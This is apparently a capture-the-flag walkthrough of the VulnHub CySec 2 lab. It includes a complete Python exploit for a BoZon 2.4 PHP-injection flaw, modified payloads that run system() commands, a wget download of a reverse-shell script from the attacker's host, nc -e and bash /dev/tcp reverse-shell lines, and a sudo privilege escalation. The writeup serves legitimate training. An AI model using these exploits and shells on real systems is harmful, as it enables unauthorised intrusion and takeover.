VulnHub: CySec: 2

Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.115

22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:00:57:62:be:65:42:f0:ba:3e:c1:47:c5:8d:fb:db (RSA)
| 256 5a:9b:20:89:19:c3:ab:d4:be:06:84:de:e4:30:d4:37 (ECDSA)
|_ 256 08:4b:f3:f8:88:7e:1a:6b:e1:8d:7f:14:60:10:7a:98 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
  • Web

Looking at the page source, we find a base64-encoded string (not encrypted, just encoded). Let's decode it with CyberChef, or with base64 -d on the command line.

view-source:http://192.168.0.115/

Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhw

Decoded:

for first flag check /challenge/index.php
for second flag check /Exolit/index.php
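Hints like this are easy to miss when the source is long. The following script is an added example written for this writeup (not part of the original post): it scans HTML for base64-looking tokens, keeps only those that decode to printable text, and is run here against a constructed page that embeds the real CySec 2 string plus two decoys.

```python
#!/usr/bin/env python3
"""Added example: pull base64 hints out of page source without CyberChef.

Written for this writeup, not part of the original post. The HTML below is
constructed; the encoded string in it is the one found on the CySec 2 page.
"""
import base64
import binascii
import re

# Runs of the base64 alphabet at least 16 chars long, optionally padded.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample: a comment carrying the real hint plus two decoys
# (a long run of 'A' that decodes to NUL bytes, and a plain word whose
# length is not a multiple of four).
SAMPLE_HTML = """<html><body>
<!-- Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhw -->
<script src="/static/app.AAAAAAAAAAAAAAAAAAAAAAAA.js"></script>
<p>nothingtoseehereplaintextword</p>
</body></html>"""


def _looks_like_text(data: bytes) -> bool:
    """Accept only decodings that are printable UTF-8 (newlines allowed)."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def find_base64_hints(html: str) -> list:
    """Return (token, decoded_text) pairs for every token that decodes cleanly."""
    hits = []
    for tok in B64_TOKEN.findall(html):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue  # wrong length or padding: not base64
        if raw and _looks_like_text(raw):
            hits.append((tok, raw.decode("utf-8")))
    return hits


if __name__ == "__main__":
    for tok, text in find_base64_hints(SAMPLE_HTML):
        print("%s...\n%s\n" % (tok[:24], text))
```

Feed it the output of curl -s http://192.168.0.115/ instead of SAMPLE_HTML to use it on a real target; the printable-text filter is what keeps minified-asset hashes and similar noise out of the results.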

At /Exolit/index.php we find the BoZon file manager, version 2.4. A quick search (Exploit-DB / searchsploit) turns up a pre-auth exploit for that version. As the payload below shows, the login name supplied to the registration form ends up inside PHP source, so a crafted name can close the string it is written into and append arbitrary PHP.

  • Exploit
import urllib,urllib2,time

#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================

EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))

if EXPLOIT==1:
    CMD="Apparition"
else:
    # Adjacent string literals concatenate, so the login becomes
    #   "];$PWN=phpinfo();////"
    # which closes the PHP string/array index the name is written into,
    # appends a statement, and comments out the rest of the line.
    CMD='"];$PWN=''phpinfo();//''//"'

if EXPLOIT != 0:
    # BoZon registration form; 'token' is left empty.
    url = 'http://'+IP+'/Exolit/index.php'
    data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
    req = urllib2.Request(url, data)

    response = urllib2.urlopen(req)
    if EXPLOIT==1:
        print 'Apparition user account created! password: abc123'
    else:
        print "Done!... waiting for phpinfo"
        time.sleep(0.5)
        print response.read()

Running the exploit, we first need an account: select 1 to create the user, then log in.

└─$ python2 exploit.py
[Bozon IP]>192.168.0.115
[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()1
Apparition user account created! password: abc123

Log in with the new account:

username: Apparition

password: abc123

Now run the exploit again, select option 2 and refresh the page: it is replaced by phpinfo() output, because the injected "user name" is evaluated on every page load. The line in the exploit responsible for this is

CMD='"];$PWN=''phpinfo();//''//"'

The three adjacent literals concatenate to "];$PWN=phpinfo();////", so anything can be substituted for phpinfo(). Swap it for a system() call:

CMD='"];system("ls -la");//''//"'

After changing this line, run the exploit again, select option 2, and refresh the page.

The command output is rendered in the page: we have code execution on the target.

“You can contact me if you have any questions.”

  • Reverse shell

Let's prepare a small payload called reverse.sh (replace YourIP with the address of our listener):

#!/bin/bash

nc -e /bin/sh YourIP 1234

Note that -e only exists in netcat builds that support it (nc.traditional, ncat); if the target's nc lacks it, bash -i >& /dev/tcp/YourIP/1234 0>&1 does the same job.

Now serve it from our machine and fetch it on the target.

Local machine

Command: python3 -m http.server 80

In the exploit, run two separate rounds (change CMD, run, select 2): the first downloads the script, the second executes it.

CMD='"];system("wget http://YourIP/reverse.sh");//''//"'

CMD='"];system("bash reverse.sh");//''//"'

Local machine

Command: nc -nvlp 1234

With the listener running, refresh the page once more and the shell connects back.

  • CySec2

If we look at the flag.txt file, we can find the password for cysec2.

Command: cat flag.txt

username = cysec2 
password = $^WAhuy457i6kj

Command: su cysec2

  • Root

Check what cysec2 is allowed to run with sudo:

Command: sudo -l

(ALL : ALL) ALL

Any command as any user, so a root shell is one command away (it prompts for cysec2's password, which we already have):

Command: sudo su

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days
